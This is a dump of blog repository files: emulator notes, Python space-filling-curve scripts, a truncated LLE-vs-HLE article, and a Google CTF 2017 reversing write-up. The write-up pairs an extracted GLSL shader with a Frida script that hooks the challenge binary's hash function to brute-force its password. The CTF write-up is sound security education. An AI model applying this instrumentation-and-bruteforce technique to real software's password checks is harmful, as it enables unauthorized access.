96 | 102 | 103 | 104 | -------------------------------------------------------------------------------- /posts/2016-09-14-jit-compiled-maps/_main.md: -------------------------------------------------------------------------------- 1 | --- 2 | layout: post 3 | date: 2016-09-07 4 | title: Fast lookups in JIT-compiled maps 5 | author: Alexandro Sanchez 6 | --- 7 | 8 | This post shows a way of optimizing lookup performance in maps associating integer keys to arbitrary data. 9 | 10 | ## Background 11 | 12 | Some time ago, I reimplemented the [RSX GPU](https://en.wikipedia.org/wiki/RSX_%27Reality_Synthesizer%27) command processor in the emulator, [Nucleus](https://github.com/AlexAltea/nucleus). This GPU is made of several engines, each bound at a specific index (*0*-*7*) of the command processor, and each index provides a MMIO register window (*0x0*-*0x1FFC*). Commands are 16-bit bitfields containing an index (3-bit) and MMIO offset (13-bit). Recent userland drivers always bound engines to the same indices and there was a limited number valid MMIO offsets, our command processor was just a big hardcoded *switch-case* mapping commands to corresponding emulator function. 13 | 14 | However, older or custom drivers might bind engines at different indices making our compile-time *switch-case* useless. Ignoring wasted memory, a static array of 2^16 entries could be a fast solution. Nevertheless, 32-bit or 64-bit commands could have made this impossible. Since lookup times are critical, this yields the question, **what's the fastest way of doing a lookup in a set of sparse commands -or sparse non-random integers- generated at runtime?** Should we use huge static arrays? Should we use hash tables? Which data structure will optimize lookup time? 15 | 16 | Jitter solves this by letting the compiler decide that. 17 | 18 | --- 19 | 20 | __TODO: More information soon.__ 21 | -------------------------------------------------------------------------------- /posts/2016-09-14-jit-compiled-maps/index.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | Fast lookups in JIT-compiled maps 8 | 9 | 10 | 11 | 51 | 52 | 53 |
54 | 61 | < Other articles 62 |
63 |
64 |

Fast lookups in JIT-compiled maps

65 |

66 | AuthorAlexandro Sanchez 69 | Date2016-09-07 72 |

73 |

This post shows a way of optimizing lookup performance in maps associating integer keys to arbitrary data.

74 |

Background

75 |

Some time ago, I reimplemented the RSX GPU command processor in the emulator, Nucleus. This GPU is made of several engines, each bound at a specific index (0-7) of the command processor, and each index provides a MMIO register window (0x0-0x1FFC). Commands are 16-bit bitfields containing an index (3-bit) and MMIO offset (13-bit). Recent userland drivers always bound engines to the same indices and there was a limited number valid MMIO offsets, our command processor was just a big hardcoded switch-case mapping commands to corresponding emulator function.

76 |

However, older or custom drivers might bind engines at different indices making our compile-time switch-case useless. Ignoring wasted memory, a static array of 2^16 entries could be a fast solution. Nevertheless, 32-bit or 64-bit commands could have made this impossible. Since lookup times are critical, this yields the question, what's the fastest way of doing a lookup in a set of sparse commands -or sparse non-random integers- generated at runtime? Should we use huge static arrays? Should we use hash tables? Which data structure will optimize lookup time?

77 |

Jitter solves this by letting the compiler decide that.

78 |
79 |

TODO: More information soon.

80 |
81 |
82 | 88 | 89 | 90 | -------------------------------------------------------------------------------- /posts/2016-10-12-xchg-rax-rax-solutions/xorpd_0x3c_hilbert.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/AlexAltea/blog/64c36758a11356204ea937897f0df56b5d4fb768/posts/2016-10-12-xchg-rax-rax-solutions/xorpd_0x3c_hilbert.png -------------------------------------------------------------------------------- /posts/2016-10-12-xchg-rax-rax-solutions/xorpd_0x3c_hilbert.py: -------------------------------------------------------------------------------- 1 | from __future__ import print_function 2 | from PIL import Image, ImageDraw, ImageColor 3 | 4 | sz = 256 # Image size 5 | mg = 32 # Image magnification (line segment size) 6 | width = 3 # Line width 7 | 8 | # Utility function for mapping list of colors names 9 | def get_colors(colors, mode='RGB'): 10 | if colors is None: 11 | colors = 'black' 12 | return list(map(lambda x: ImageColor.getcolor(x, mode), colors.split(','))) 13 | 14 | def popcount(x): 15 | n = 0 16 | while x: 17 | n += 1 18 | x &= (x - 1) # Clear the bottom-most set bit - cf snippet 0x2f 19 | return n 20 | 21 | def hilbert_direction(idx): 22 | aa = 0xaa 23 | aa |= aa << 8 24 | aa |= aa << 16 25 | aa |= aa << 32 26 | r = popcount(idx & (idx & aa) >> 1) & 1 27 | s = popcount(-idx & (-idx & aa) >> 1) & 1 28 | return 1 - r - s, r - s 29 | 30 | def draw_hilbert(n, mg, width=1, colors=None, mode='RGB'): 31 | # how much to shift lines by 32 | e = width >> 1 33 | # Calculate canvas size 34 | sz = mg * ((1 << n) - 1) + width 35 | pos = (e, e) 36 | img = Image.new(mode, (sz, sz), get_colors('white', mode)[0]) 37 | draw = ImageDraw.Draw(img) 38 | colors = get_colors(colors, mode) 39 | for i in range(1, 1 << (n << 1)): 40 | dx, dy = hilbert_direction(i) 41 | npos = (pos[0] + mg * dx, pos[1] - mg * dy) 42 | line = [ pos, npos ] 43 | draw.line(line, fill=colors[(i - 1) % len(colors)], width=width) 44 | pos = npos 45 | return img 46 | 47 | img = draw_hilbert(5, mg=16, colors='blue,red',width=7) 48 | img.show() 49 | img.save('xorpd_0x3c_hilbert.png', optimize=True, dpi=(150, 150)) 50 | -------------------------------------------------------------------------------- /posts/2016-10-12-xchg-rax-rax-solutions/xorpd_0x3d_morton.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/AlexAltea/blog/64c36758a11356204ea937897f0df56b5d4fb768/posts/2016-10-12-xchg-rax-rax-solutions/xorpd_0x3d_morton.png -------------------------------------------------------------------------------- /posts/2016-10-12-xchg-rax-rax-solutions/xorpd_0x3d_morton.py: -------------------------------------------------------------------------------- 1 | from __future__ import print_function 2 | from PIL import Image, ImageDraw, ImageColor 3 | 4 | n = 5 # Generation number 5 | mg = 32 # Image magnification (line segment size) 6 | width = 3 # Line width 7 | 8 | def morton(n): 9 | pos = [ 0, 0 ] 10 | yield tuple(pos) 11 | for i in range(1, 1 << (2 * n)): 12 | k = 1 13 | while True: 14 | pos[0] ^= k 15 | k &= ~pos[0] 16 | if not k: 17 | break 18 | pos[1] ^= k 19 | k &= ~pos[1] 20 | if not k: 21 | break 22 | k <<= 1 23 | yield tuple(pos) 24 | 25 | def disinterleave(z): 26 | x = 0 27 | y = 0 28 | k = 0 29 | while z: 30 | x |= (z & 1) << k 31 | y |= (z & 2) << k 32 | z >>= 2 33 | k += 1 34 | y >>= 1 35 | return x, y 36 | 37 | def interleave(x, y): 38 | z = 0 39 | y <<= 1 40 | k = 0 41 | while x or y: 42 | z |= ((x & 1) | (y & 2)) << k 43 | x >>= 1 44 | y >>= 1 45 | k += 2 46 | return z 47 | 48 | def morton2(n): 49 | for i in range(1 << (2 * n)): 50 | yield disinterleave(i) 51 | 52 | def scale_point(pt, corner, mg): 53 | return corner[0] + pt[0] * mg, corner[1] + pt[1] * mg 54 | 55 | def draw_morton(n, mg, width, color='black'): 56 | sz = width + mg * ((1 << n) - 1) 57 | img = Image.new('RGB', (sz, sz), ImageColor.getcolor('white', 'RGB')) 58 | draw = ImageDraw.Draw(img) 59 | gen = morton(n) 60 | corner = (width >> 1, width >> 1) 61 | scaler = lambda x: scale_point(x, corner, mg) 62 | pos = next(gen) 63 | for npos in gen: 64 | draw.line(list(map(scaler, [ pos, npos ])), fill=ImageColor.getcolor(color, img.mode), width=width) 65 | pos = npos 66 | return img 67 | 68 | img = draw_morton(5, mg=16, color='black', width=1) 69 | img.show() 70 | img.save('xorpd_0x3d_morton.png', optimize=True, dpi=(150, 150)) 71 | -------------------------------------------------------------------------------- /posts/2016-10-12-xchg-rax-rax-solutions/xorpd_0x3f_hanoi.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/AlexAltea/blog/64c36758a11356204ea937897f0df56b5d4fb768/posts/2016-10-12-xchg-rax-rax-solutions/xorpd_0x3f_hanoi.png -------------------------------------------------------------------------------- /posts/2017-07-19-googlectf-2017-moon/_main.md: -------------------------------------------------------------------------------- 1 | --- 2 | layout: post 3 | date: 2017-06-19 4 | title: GoogleCTF 2017 Reversing/Moon writeup 5 | author: Alexandro Sanchez 6 | --- 7 | 8 | Last weekend I participated on the [Google CTF 2017](https://capturetheflag.withgoogle.com/) as part of the glorious team "*63 7c 77 7b f2 6b 6f c5 30 01 67 2b fe d7 ab 76*" composed of [AlexF0rtune](https://twitter.com/AlexF0rtune) and me. Among the many tough and fun challenges that we attempted, and the few ones that we actually solved, *moon* was certainly the most entertaining one for me, so I decided to prepare a writeup of my solution. 9 | 10 | The problem simply states: 11 | 12 | > What's the password? 13 | > [moon.zip](moon.zip) 14 | 15 | 16 | ## Static analysis 17 | 18 | After extracting the ZIP file, we see our target is a Win32 executable, using OpenGL to render a simple UI asking for a password of length 32. For wrong passwords it will display the message: "*Nope*". 19 | 20 | As usual with these kind of challenges, one would start by looking for occurrences of this string within the executable, and find code referencing said string. Opening the executable with [IDA Pro](https://www.hex-rays.com/products/ida/) and searching for strings containing `Nope` we find the string `____NopeGood` referenced in `sub_402660`. Decompiled and slightly formatting the relevant code results in: 21 | 22 | ```cpp 23 | // const char aNopegood[] = " NopeGood"; 24 | v12 = dword_4CA0AC; 25 | v15 = 4 * v12; 26 | v16 = (unsigned __int8)aNopegood[v15]; 27 | ``` 28 | 29 | The value `dword_4CA0AC` acts as an index into the aforementioned string. If we want to succeed (i.e. obtain `Good`) we need its value to be 2. If we search of occurrences where the value at `4CA0AC` is modified to 2 we obtain the following occurrence in the function `sub_498A10`: 30 | 31 | ![](ida.png) 32 | 33 | In order to pass the test, both buffers passed to `memcmp` have to match. 34 | 35 | 36 | ## Dynamic analysis 37 | 38 | To simplify the process of reversing, we used [x64dbg](http://x64dbg.com/) to quickly debug and inspect the memory of the program while it's running. 39 | 40 | These buffers seem to contain each 512 bytes of what looks like the hexadecimal representation of a hash. The contents pointed by `rcx` change every time the password is modified (*computed hash string*). The contents pointed by `rdx` are constant (*expected hash string*) and it's first bytes are: 41 | 42 | ``` 43 | 0 1 2 3 4 5 6 7 8 9 A B C D E F 0123456789ABCDEF 44 | 0000000000F86BD0 33 30 63 37 65 61 64 39 37 31 30 37 37 37 35 39 30c7ead971077759 45 | 0000000000F86BE0 36 39 62 65 34 62 61 30 30 63 66 35 35 37 38 66 69be4ba00cf5578f 46 | ... 47 | ``` 48 | 49 | After reversing `sub_498A10`, we realize that the *computed buffer* is generated by converting each integer from a buffer `uint32_t hash[64]` (i.e. length 0x100) into a hexadecimal string via `%.8x` (see `sub_4016D0`). Concatenating all these hexadecimal strings results in the aforementioned hexadecimal string. Relevant code: 50 | 51 | ```cpp 52 | v14 = (__int128 *)&v41; 53 | // ... 54 | if ((unsigned __int8)sub_401BF0(qword_4CA080, (unsigned __int64)&v41)) { 55 | do { 56 | v15 = *(_DWORD *)v14; 57 | v28 = 0i64; 58 | v29 = 0; 59 | sub_4016D0(&v28, "%.8x", v15); 60 | v16 = (char *)&v28 + strlen((const char *)&v28); 61 | if ( v16 - (char *)&v28 > 0x7FFFFFFFFFFFFFFFi64 - Size ) 62 | sub_4921C0("basic_string::append"); 63 | sub_486EE0(&Memory, &v28, v16 - (char *)&v28); 64 | v14 = (__int128 *)((char *)v14 + 4); 65 | } 66 | // ... 67 | } 68 | ``` 69 | 70 | This buffer pointed by `v41` contains the raw bytes of the hash. This hash is updated by the function `sub_401BF0(const char* password, char* hash)` every time the user-supplied password reaches 32 characters in length. 71 | 72 | Brief pause: 73 | > As you see, instead of reverse engineering entire functions and then making sense of the code, our approach could be described as doing inverse data-taining manually and reverse engineering only the necessary bits along the way. 74 | 75 | Inside `sub_401BF0` we attempted to locate where the data copied to the hash pointer `v41` was coming from. It was being copied from another buffer at address `0000000007478000` (in that particular execution) which looked "quite suspicious" due to following reasons: 76 | 77 | 1. Hardware breakpoints on memory accesses were not working. 78 | 2. This buffer was filled right after calling functions from my GPU driver libraries (in my case `ig9icd64.dll`), most likely just its OpenGL implementation. 79 | 80 | ``` 81 | 0 1 2 3 4 5 6 7 8 9 A B C D E F 0123456789ABCDEF 82 | 0000000007478000 01 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 ................ 83 | 0000000007478010 01 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 ................ 84 | ... 85 | 0000000007478100 E3 5C A9 DE C6 42 8F 29 61 7C A1 5C 44 62 87 AB ã\©ÞÆB.)a|¡\Db.« 86 | 0000000007478110 E7 1D B9 DA C2 03 9F 2D 65 3D B1 58 40 23 97 AF ç.¹ÚÂ..-e=±X@#.¯ 87 | ... 88 | ``` 89 | 90 | We suspect GPGPU is coming into play and that compute shaders might be responsible for generating the hash. 91 | 92 | 93 | ## Extracting compute shaders 94 | 95 | Looking at the strings in the executable, it's clear that no compute shader is visible as plaintext. However, rather than inspecting which of the many functions is responsible of decrypting the GLSL source, or trying to locate it somewhere within the user address space. We fetch it from where the application could never hide it: the GPU driver libraries. 96 | 97 | For that purpose we use [Apitrace](http://apitrace.github.io/). We spawn *moon.exe* with it, in *OpenGL* mode, fill out a dummy password, close the application and proceed to inspect the list of captured frames. From the long list of frames, most with 1027 calls, we notice one with 1041 calls. As expected, the small difference here is that the application maps shader storage buffer and fills it with `GL_COMPUTE_SHADER` data. 98 | 99 | ![](apitrace.png) 100 | 101 | Apitrace provides us the application-supplied source code for the mapped shader, which we auto-formatted for readability reasons. You can read the entire GLSL source code at: [moon.glsl](moon.glsl). 102 | 103 | Next, we will discuss the most important parts of the shader. Firstly, we observed the following input/output buffers: 104 | 105 | ```glsl 106 | layout(std430, binding = 0) buffer shaderExchangeProtocol { 107 | uint state[64]; 108 | uint hash[64]; 109 | uint password[32]; 110 | }; 111 | ``` 112 | 113 | The meaning of `password` is clear from the context. Inspecting the GLSL code we notice that every invocation of the shader results in a `uint32_t` value being updated in `hash[idx]`. Similarly, the value `state[idx]` changes from 1 to 2 to mark that particular task as finished. 114 | 115 | ```glsl 116 | if ((idx & 1) == 0) { 117 | final = hash_alpha(password[idx / 2]); 118 | } else { 119 | final = hash_beta(password[idx / 2]); 120 | } 121 | ``` 122 | 123 | For every character in `password`, two different hashes are computed, `hash_alpha` and `hash_beta`, each resulting in a `uint32_t` value that is stored in the `hash` buffer after XOR'ing it further. More details on these operations will be given in the following paragraphs. 124 | 125 | Our goal now is to recover the password from the expected hash. Here we noticed two possible approaches, a quick one (which we used in the CTF), and a more elegant one (for the sake of perfectionism and pleasing mathematicians). 126 | 127 | 128 | ## Strategy #1: The Hacker's Approach 129 | 130 | Every invocation of the compute shader takes into account a **single character** of the password in order to generate a `uint32_t` value of the hash, except for the final part that interates over the whole password: 131 | 132 | ```glsl 133 | uint h = 0x5a; 134 | for (i = 0; i < 32; i++) { 135 | uint p = password[i]; 136 | uint r = (i * 3) & 7; 137 | p = (p << r) | (p >> (8 - r)); 138 | p &= 0xff; 139 | h ^= p; 140 | } 141 | final ^= (h | (h << 8) | (h << 16) | (h << 24)); 142 | ``` 143 | 144 | However, since `p` is always masked with 0xFF, `h` will be in range [0x00, 0xFF]. Thus, there are only 256 possible values with which the `final` variable could be XOR'ed (e.g. `01010101`, `02020202`, etc.). This can be bruteforced by iterating over every possible value of `h`. 145 | 146 | * __Bruteforcing algorithm__: For every position `i` in the password, we try character `c` and temporarily set `password[i] = c`. We calculate the first of the two resulting `uint32_t` hash values (we don't need the second one!) and, as described before, we XOR the result with every of the 256 possible values with which `final` could be XOR'ed. If there's a match, we keep the character `c` and move on with the next `i`. 147 | 148 | Considering a 32-byte password and 256 choices for each `c` and `h`, we get the following worst case scenario: 32 * 256 * 256 = 2097152 attempts. 149 | 150 | We could reimplement the whole algorithm again, which would certainly save computing time. But on a CTF, it's *our* time the one that matters. To solve the challenge as quick as possible time we used [Frida](https://www.frida.re/) to instrument *moon.exe*, and automatically execute the function `sub_401BF0` for arbitrary passwords. You can find the source code at [bruteforcer.py](bruteforcer.py). 151 | 152 | 153 | To explain the code briefly: We allocate the buffers that will hold both the password and hash. We will pass them as arguments to the *hashgen* function (aka. `sub_401BF0`), which is transformed into a `NativeFunction` to be invocated later on directly from our code. 154 | 155 | ```javascript 156 | // Buffers 157 | var pswd_ptr = Memory.alloc(0x20); 158 | var hash_ptr = Memory.alloc(0x400); 159 | 160 | var hashgen_ptr = new NativePointer(0x401BF0); 161 | var hashgen = new NativeFunction(keygen_ptr, 'int', ['pointer', 'pointer']); 162 | ``` 163 | 164 | Then, for every choice of `i`, `c`, `h`, we have the following block of code (i.e. deep within three nested loops). 165 | 166 | ```javascript 167 | var maskh = to_uint32(h | (h << 8) | (h << 16) | (h << 24)); 168 | Memory.writeU8(pswd_ptr.add(i), c); 169 | keygen(pswd_ptr, hash_ptr); 170 | var dword = Memory.readU32(hash_ptr.add(8*i)) ^ maskh; 171 | if (to_uint32(dword) == to_uint32(expected[2*i])) { 172 | valid = true; 173 | break; 174 | } 175 | ``` 176 | 177 | After around 1 minute of computing time we obtain the following output. Challenge solved! 178 | 179 | ``` 180 | CTF{OpenGLMoonMoonG0esT0TheMoon} 181 | ``` 182 | 183 | Small addendum: 184 | * Note that we didn't need to understand what `hash_alpha` and `hash_beta` were doing. We recovered the entire password just by cleverly bruteforcing over (half of!) the expected hash buffer entries. 185 | * We are aware that `h` does not need to be bruteforced again for `i > 0` and by restricting ourselves to printable choices of `c` we could bring the worst case scenario down to: 32 * (0x7E - 0x20 + 1) + 256 = 3264 attempts (x100 speedup). However, the naive approach was fast enough for us. 186 | 187 | 188 | ## Strategy #2: The Mathematician's Approach 189 | 190 | We start by analyzing `hash_alpha` and `hash_beta`. They are identical, except that they access different indices from the vector `calc(p)`, corresponding to its components X and Y respectively. The function `calc` converts character `p`, interpreted as degrees, to radians stored in the variable `r`. Then, it computes the following: 191 | 192 | ![$$ 193 | \begin{pmatrix} 194 | \cos{r} & -\sin{r} & 0 \\ 195 | \sin{r} & \cos{r} & 0 \\ 196 | 0 & 0 & 1 \\ 197 | \end{pmatrix} 198 | \cdot 199 | \begin{pmatrix} 1024 \\ 0 \\ 0 \end{pmatrix} + 200 | \begin{pmatrix} 2048 \\ 2048 \\ 0 \end{pmatrix} 201 | $$](latex-1.png) 202 | 203 | Thus we know that the intermediate values are in range [0, 2048] since: 204 | * *X*: `uint(calc(p)[0]) == 1024*cos(r) + 2048`. 205 | * *Y*: `uint(calc(p)[1]) == 1024*sin(r) + 2048`. 206 | 207 | Given *X* and *Y* we could compute back `p` via: 208 | 209 | ![$$ 210 | \text{degrees}(\text{atan2}(\frac{Y - 2048}{1024}, \frac{X - 2048}{1024})) 211 | $$](latex-2.png) 212 | 213 | Next, we analyze the `extend` function: 214 | 215 | ```glsl 216 | uint extend(uint e) { 217 | uint i; 218 | uint r = e ^ 0x5f208c26; 219 | for (i = 15; i < 31; i += 3) { 220 | uint f = e << i; 221 | r ^= f; 222 | } 223 | return r; 224 | } 225 | ``` 226 | 227 | The argument `e` is XOR'ed with a constant and then again with multiple copies of itself shifted by some amount. *Luckily* for us those shifts are larger than 15, that the low 15 bits are left untouched, which is enough to keep or values *X*,*Y* undamaged as they are in range [0, 2048]. 228 | 229 | This concludes the `hash_alpha` and `hash_beta` functions. Next, we analyze the code modifying the `final` variable inside the `main` function. The first loop is actually a constant-ish XOR (only depends on the index, which is known), so we are able to revert this as well: 230 | 231 | ```glsl 232 | uint i; 233 | for (i = 0; i < 32; i += 6) { 234 | final ^= idx << i; 235 | } 236 | ``` 237 | 238 | For the final part, as mentioned in the previous section, we could try bruteforcing which of the 256 possible values of `h` is the correct one. However, note that undoing the previous constant XOR's should have yield the values for *X* and *Y* whose bits with index #15 to #11 should be zero (since 2048 = 2^11). This indirectly tells you those bits for `h` which slightly reduces the entropy. 239 | 240 | Putting all together, for some `h`, the steps to recover the password character at index `i`, given corresponding hashes *A* and *B* are as follow: 241 | 1. Revert the XORs in `main` for *A* and *B*. 242 | 2. Revert the XOR in `extend` for *A* and *B*. 243 | 3. Compute `X = (A ^ 0x5F208C26) & 0x7FFF` and `Y = (B ^ 0x5F208C26) & 0x7FFF`. 244 | 4. Compute `c = deg(atan2((Y-2048)/1024, (X-2048)/1024)`. 245 | 5. Set `password[i] = c`. 246 | 247 | Once again, challenge solved! 248 | 249 | There is no code available for this approach since it's not the strategy we followed in the CTF, but we found it quite an elegant approach worthy of discussion. 250 | -------------------------------------------------------------------------------- /posts/2017-07-19-googlectf-2017-moon/_main.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/AlexAltea/blog/64c36758a11356204ea937897f0df56b5d4fb768/posts/2017-07-19-googlectf-2017-moon/_main.pdf -------------------------------------------------------------------------------- /posts/2017-07-19-googlectf-2017-moon/apitrace.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/AlexAltea/blog/64c36758a11356204ea937897f0df56b5d4fb768/posts/2017-07-19-googlectf-2017-moon/apitrace.png -------------------------------------------------------------------------------- /posts/2017-07-19-googlectf-2017-moon/bruteforcer.py: -------------------------------------------------------------------------------- 1 | import frida 2 | import time 3 | 4 | code = """ 5 | 'use strict'; 6 | 7 | var pswd_ptr = Memory.alloc(0x20); 8 | var hash_ptr = Memory.alloc(0x400); 9 | 10 | var keygen_ptr = new NativePointer(0x401BF0); 11 | var keygen = new NativeFunction(keygen_ptr, 'int', ['pointer', 'pointer']); 12 | 13 | var expected = [ 14 | 0x30c7ead9, 0x71077759, 15 | 0x69be4ba0, 0x0cf5578f, 16 | 0x1048ab13, 0x75113631, 17 | 0xdbb6871d, 0xbe35162b, 18 | 0x1c62e982, 0xeb6a7512, 19 | 0xf3274743, 0xfb2e55c8, 20 | 0x18912779, 0xef7a3416, 21 | 0x9a838666, 0xff3994bb, 22 | 0x4d3c6e14, 0xba2d732f, 23 | 0x14414f2c, 0x1cb5d384, 24 | 0x4935aebb, 0xbe3fb206, 25 | 0x343a004e, 0x18a092da, 26 | 0xba02e3c0, 0x96987154, 27 | 0x8ed2c372, 0xeb68d1af, 28 | 0x41152cb3, 0xb61f300e, 29 | 0x3c1a8246, 0x108010d2, 30 | 0x82e16df8, 0xae7bff6c, 31 | 0xb6314d4a, 0xd38b5f97, 32 | 0x79ef2320, 0x8efe3e1b, 33 | 0x69970042, 0x9eae1fa9, 34 | 0x3c036e5d, 0xcbe87d32, 35 | 0xbe1ecfac, 0x2452ddfd, 36 | 0xc704a00e, 0xa24fbc21, 37 | 0x61b7824a, 0x968e9da1, 38 | 0xdb756712, 0xbe3e7b3d, 39 | 0x3420c8f3, 0x3c37dba4, 40 | 0x2072a941, 0xd799ba2e, 41 | 0xebbf8619, 0x1cb59aa4, 42 | 0x9a80ebe0, 0xb61a7974, 43 | 0x1888cb62, 0x341259f6, 44 | 0x2848aad4, 0x4df2b809, 45 | 0x383e0943, 0x7928980f 46 | ]; 47 | 48 | function to_uint32(n) { 49 | return (n + 0x100000000) & 0xFFFFFFFF; 50 | } 51 | 52 | Interceptor.attach(keygen_ptr, { 53 | onEnter: function (args) { 54 | for (var i = 0; i < 0x20; i++) { 55 | console.log("Index " + i + " of 32"); 56 | for (var c = 0; c < 0x100; c++) { 57 | var valid = false; 58 | for (var h = 0; h < 0x100; h++) { 59 | var maskh = to_uint32(h | (h << 8) | (h << 16) | (h << 24)); 60 | Memory.writeU8(pswd_ptr.add(i), c); 61 | keygen(pswd_ptr, hash_ptr); 62 | var dword = Memory.readU32(hash_ptr.add(8*i)) ^ maskh; 63 | if (to_uint32(dword) == to_uint32(expected[2*i])) { 64 | valid = true; 65 | break; 66 | } 67 | } 68 | if (valid) break; 69 | } 70 | } 71 | console.log(hexdump(pswd_ptr, {length: 32})); 72 | console.log(Memory.readUtf8String(pswd_ptr, 32)); 73 | } 74 | }); 75 | """ 76 | 77 | def on_message(message, data): 78 | print(message) 79 | 80 | pid = frida.spawn(['moon/moon.exe']) 81 | frida.resume(pid) 82 | 83 | session = frida.attach(pid) 84 | script = session.create_script(code) 85 | script.on('message', on_message) 86 | script.load() 87 | -------------------------------------------------------------------------------- /posts/2017-07-19-googlectf-2017-moon/ida.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/AlexAltea/blog/64c36758a11356204ea937897f0df56b5d4fb768/posts/2017-07-19-googlectf-2017-moon/ida.png -------------------------------------------------------------------------------- /posts/2017-07-19-googlectf-2017-moon/latex-1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/AlexAltea/blog/64c36758a11356204ea937897f0df56b5d4fb768/posts/2017-07-19-googlectf-2017-moon/latex-1.png -------------------------------------------------------------------------------- /posts/2017-07-19-googlectf-2017-moon/latex-2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/AlexAltea/blog/64c36758a11356204ea937897f0df56b5d4fb768/posts/2017-07-19-googlectf-2017-moon/latex-2.png -------------------------------------------------------------------------------- /posts/2017-07-19-googlectf-2017-moon/moon.glsl: -------------------------------------------------------------------------------- 1 | #version 430 2 | layout(local_size_x = 8, local_size_y = 8) in ; 3 | layout(std430, binding = 0) buffer shaderExchangeProtocol { 4 | uint state[64]; 5 | uint hash[64]; 6 | uint password[32]; 7 | }; 8 | vec3 calc(uint p) { 9 | float r = radians(p); 10 | float c = cos(r); 11 | float s = sin(r); 12 | mat3 m = mat3(c, -s, 0.0, s, c, 0.0, 0.0, 0.0, 1.0); 13 | vec3 pt = vec3(1024.0, 0.0, 0.0); 14 | vec3 res = m * pt; 15 | res += vec3(2048.0, 2048.0, 0.0); 16 | return res; 17 | } 18 | uint extend(uint e) { 19 | uint i; 20 | uint r = e ^ 0x5f208c26; 21 | for (i = 15; i < 31; i += 3) { 22 | uint f = e << i; 23 | r ^= f; 24 | } 25 | return r; 26 | } 27 | uint hash_alpha(uint p) { 28 | vec3 res = calc(p); 29 | return extend(uint(res[0])); 30 | } 31 | uint hash_beta(uint p) { 32 | vec3 res = calc(p); 33 | return extend(uint(res[1])); 34 | } 35 | void main() { 36 | uint idx = gl_GlobalInvocationID.x + gl_GlobalInvocationID.y * 8; 37 | uint final; 38 | if (state[idx] != 1) { 39 | return; 40 | } 41 | if ((idx & 1) == 0) { 42 | final = hash_alpha(password[idx / 2]); 43 | } else { 44 | final = hash_beta(password[idx / 2]); 45 | } 46 | uint i; 47 | for (i = 0; i < 32; i += 6) { 48 | final ^= idx << i; 49 | } 50 | uint h = 0x5a; 51 | for (i = 0; i < 32; i++) { 52 | uint p = password[i]; 53 | uint r = (i * 3) & 7; 54 | p = (p << r) | (p >> (8 - r)); 55 | p &= 0xff; 56 | h ^= p; 57 | } 58 | final ^= (h | (h << 8) | (h << 16) | (h << 24)); 59 | hash[idx] = final; 60 | state[idx] = 2; 61 | memoryBarrierShared(); 62 | } 63 | -------------------------------------------------------------------------------- /posts/2017-07-19-googlectf-2017-moon/moon.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/AlexAltea/blog/64c36758a11356204ea937897f0df56b5d4fb768/posts/2017-07-19-googlectf-2017-moon/moon.zip -------------------------------------------------------------------------------- /posts/2018-04-18-lle-vs-hle/_main.md: -------------------------------------------------------------------------------- 1 | --- 2 | layout: post 3 | date: 2018-04-18 4 | title: LLE vs HLE and their tradeoffs 5 | author: Alexandro Sanchez 6 | --- 7 | 8 | ## Introduction 9 | 10 | This article aims to give an intuitive understanding for the terms "*Low-Level Emulation*" (LLE) and "*High-Level Emulation*" (HLE) often heard in the emulation scene, their differences and tradeoffs in development/performance costs, and how developers choose one paradigm or the other. 11 | 12 | Machines are made of several *layers of abstraction*, each of them relying in the layer below to perform some particular task. In the context of gaming consoles, you might consider these layers (ordered from higher to lower level): 13 | 14 | - Game 15 | - Game engine 16 | - System libraries 17 | - Kernel/drivers 18 | - Hardware 19 | 20 | That's where these "*low-level*" or "*high-level*" terms come from. Something is more "*high-level*" when it has more layers of abstraction below it, and it's more "*low-level*" when it has more layers of abstraction above it. With so many layers, the terms "low" and "high" can become quite subjective (developers can't even agree about whether some emulators are HLE or LLE). Furthermore, you could go even below than hardware-level and start thinking about transistors, atoms, etc. as even deeper layers of abstraction. Similarly, there's also even higher levels like the game scripts that are sometimes used to handle events/dialogues in a game. Of course, for most emulators, these layers are either too low, or too high. Why? 21 | 22 | ## Emulation paradigms 23 | 24 | Let's tackle this question after giving an intuitive notion of what emulation is. Emulating a system all about putting a "*barrier*" between two adjacent layers of abstraction. For instance: 25 | 26 | - "*LLE emulators*" ([EPSXE](http://www.epsxe.com/), [PCSX2](https://pcsx2.net/)): They put the barrier between the hardware and the kernel. The entire software stack would run as usual thinking it's on a real PS1, PS2 etc., but whenever the hardware is accessed (e.g. PCI configuration registers, MMIO accesses, etc.) the emulator would intercept that and execute whatever the emudevs wanted. This is the reason why you get the original console menus and the overall "look and feel" of the console. 27 | - "*HLE emulators*" ([RPCS3](https://rpcs3.net/), [Citra](https://citra-emu.org/)): They put the barrier between the kernel and userland (i.e. applications, games, etc.). The application runs as usual (of course, after translating userland instructions), but whenever it needs to access the operating system (e.g. to open files, to map memory, to create threads), that request aka. syscall will be intercepted and handled by some code written by the emudevs. This is the reason why you can typically just drag-and-drop a game and start playing it without booting any underlying OS. 28 | 29 | Back to the original question, why do emulators pick the barriers always at these two "hot spots", i.e. LLE (hardware and kernel) and HLE (kernel and userland)? 30 | 31 | When you place this "emulation" barrier between two layers, you have to **reimplement** the layer below (i.e. reimplement the hardware on LLE, reimplement the kernel on HLE), so that the layer(s) above it can **execute** successfully. This results in two costs that you have to balance: "*development time*" and "*execution time*". Let me explain why this balance is important with few extreme examples of poor balances: 32 | 33 | - *Too high-level*: What would happen if you'd put that barrier between the game engine and the actual game? This idea used to be not so crazy, as it's what https://www.scummvm.org/ does. However, game engines these days are insanely complex with several million lines of code, it would take you centuries as a single developer to write an emulator that operated at such high levels. The "*development time*" would be massive, but the "*execution time*" (i.e. the emulator's performance) would be pretty good, since all the complex tasks have been reimplemented natively for the host system. 34 | 35 | - *Too low-level*: What would happen if you wrote a transistor-level emulator? Again, not so crazy for old platforms, see the http://www.visual6502.org/ project. Assuming you had the equipment to decap a chip, a scanning electron microscope and fancy computer vision algorithms, you could easily generate code that simulates your target microprocessor, so little 